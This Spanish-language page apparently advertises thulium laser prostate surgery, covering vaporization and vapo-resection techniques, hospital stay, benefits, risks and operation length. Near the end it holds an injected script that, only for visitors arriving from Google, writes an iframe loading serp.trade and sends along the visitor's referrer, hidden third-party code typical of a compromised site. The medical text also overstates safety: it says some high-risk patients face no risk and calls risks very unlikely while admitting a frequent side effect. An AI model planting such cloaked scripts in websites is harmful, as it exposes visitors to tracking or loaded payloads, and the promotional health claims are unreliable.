Próstata con Láser Tulio

¿En qué consiste la Operación de Láser de Tulio de Próstata? 

Se trata de la tecnología más reciente para combatir  la hiperplasia benigna de próstata y además aporta ventajas mayores tanto al láser verde como respecto a las técnicas tradicionales de resección transuretral de próstata. Existen dos procedimientos:

 

  1. La Vaporización de próstata, consiste en evaporar el tejido prostático agrandado a través de su calentamiento. Esto se permite gracias a que el agua intracelular del tejido es calentado mediante el Láser de Tulio hasta elevándose hasta los cien grados. El agua que se localiza dentro de la célula se evapora junto al resto de material celular. 
 

Así se consigue la eliminación del tejido que ha crecido de la próstata a la vez que se dispersa parte del calor hacia el tejido que no se vaporiza provocando un efecto hemostático consiguiendo que se minimice el sangrado típico de los procedimientos tradicionales. 

 

2. Vapo-resección de próstata combina la vaporización del tejido mencionada antes, con la resección del tejido mediante un haz láser. La técnica es muy eficaz en las próstatas de un volumen grande, además con el tejido ya extirpado, permite obtener muestras para poderlo analizar tras el procedimiento y así eliminar prácticamente la totalidad del tejido agrandado.

operacion prostata laser tulio precio guipuzcoa

¿Cuánto tiempo de recuperación se necesita?

El paciente permanecerá unas 24 horas en el hospital portando una sonda para ayudar con la orina. Recibirá el alta cuando recupere la micción espontánea. En este caso, el sangrado será mínimo con la tecnología del Láser de Tulio, razón por la que el tiempo de estancia en el hospital es muy corta.

¿Qué ventajas y riesgos tiene la Operación de Próstata con Láser de Tulio?

La principal ventaja de la cirugía es la solución de los síntomas de la Hiperplasia Benigna de Próstata. 

Respecto a las ventajas añadidas de someterse a la operación para reducir el tamaño de la próstata en lugar de los procedimientos tradicionales encontramos:

 

  • El láser de Tulio realiza la función de vaporización y resección a una mayor velocidad que sus predecesores.
 
  • Evita así el sangrado que provoca las estancias hospitalarias prolongadas de los procedimientos tradicionales.
 
  • La duración de la operación es menor que en los otros procedimientos.
 
  • La probabilidad de sufrir disfunción eréctil e incontinencia urinaria se reduce.
 
  • Mediante el Láser de Tulio, la posibilidad de sufrir algún problema relacionado con la operación es poco probable.
 
  • Los pacientes que tienen algún tipo de cardiopatías, son de una avanzada edad o que están, tomando anticoagulantes pueden someterse a esta operación sin riesgos.
 

Los riesgos son muy poco probables que se pueden nombrar son los siguientes:

 

  • No se elimina el riesgo de sufrir cáncer de próstata en el tejido prostático que no se ha extraído.
 
  • La eyaculación retrógrada aparece en un alto porcentaje de los casos. Las probabilidades son muy parecidas tanto en las tradicionales como en el láser de  Tulio.
 

¿Cuánto tiempo dura la Operación de Láser de Tulio?

 

La duración de cada intervención depende del tamaño de la próstata que van desde los 30 a los 120 cm. De unas 2 horas para las operaciones de las glándulas, y media hora en las más pequeñas. El resultado de la técnica perdura en el tiempo y los pacientes quedan muy satisfechos al haberse solucionado su dolencia. La operación se estima que tiene alrededor de un 95% de éxito.

Operación de próstata con láser tulio precio

Hospitales donde se realiza la Cirugía de Próstata con Láser Tulio

operacion laser tulio madrid
<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>

Artículos de interés

Importante: Esta información tiene únicamente un carácter informativo y en ningún caso médico. Es importante que consulte a su médico sobre su enfermedad específica y el tratamiento más adecuado.

Call Now ButtonLlama ahora